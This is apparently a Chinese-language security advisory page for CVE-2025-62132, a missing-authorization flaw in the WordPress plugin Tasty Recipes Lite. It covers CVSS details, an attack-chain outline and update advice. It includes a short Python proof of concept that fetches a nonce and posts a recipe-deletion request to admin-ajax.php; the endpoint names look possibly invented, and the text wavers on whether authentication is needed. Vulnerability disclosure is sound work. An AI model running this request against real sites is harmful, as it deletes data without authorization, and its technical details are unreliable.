CVE-2025-62132 CVSS 4.3 中危

CVE-2025-62132: Tasty Recipes Lite 插件缺失授权漏洞

披露日期: 2025-12-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-62132

漏洞类型

Missing Authorization (缺失授权)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Strategy11 Team Tasty Recipes Lite (tasty-recipes-lite)

漏洞概述

CVE-2025-62132是WordPress插件Tasty Recipes Lite中发现的一个中等严重性安全漏洞，CVSS评分4.3。该漏洞属于缺失授权(Missing Authorization)类型，允许攻击者利用错误配置的访问控制安全级别进行未授权操作。攻击者可能通过构造特定的HTTP请求来绕过权限检查，执行本应需要相应权限才能进行的操作。受影响的插件版本为1.1.5及更低版本，建议用户立即更新至最新版本以修复此安全问题。

技术细节

该漏洞源于Tasty Recipes Lite插件在处理用户请求时未正确验证用户权限。攻击者可以利用低权限账户或未认证用户身份，通过发送精心构造的请求来触发未经授权的功能。漏洞主要影响插件的访问控制机制，使其无法有效防止越权访问。修复方案包括加强权限验证逻辑，确保所有敏感操作都经过适当的授权检查。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标WordPress站点并确认Tasty Recipes Lite插件版本

STEP 2

步骤2: 构造请求

攻击者构造包含恶意参数的HTTP请求以绕过授权检查

STEP 3

步骤3: 执行攻击

发送精心设计的请求触发未授权功能

STEP 4

步骤4: 达成目标

成功执行越权操作，可能导致数据泄露或系统破坏

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target = 'http://target-wordpress-site.com'

# 获取Nonce
response = requests.get(f'{target}/wp-admin/admin-ajax.php?action=tasty_recipes_get_nonce')
nonce = response.json()['data']

# 利用漏洞执行未授权操作
payload = {
    'action': 'tasty_recipes_admin_action',
    'nonce': nonce,
    'subaction': 'delete_recipe',
    'recipe_id': 1
}
requests.post(f'{target}/wp-admin/admin-ajax.php', data=payload)

影响范围

1.1.5及更低版本

防御指南

临时缓解措施

立即更新Tasty Recipes Lite插件至最新版本，限制用户权限，启用双因素认证

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表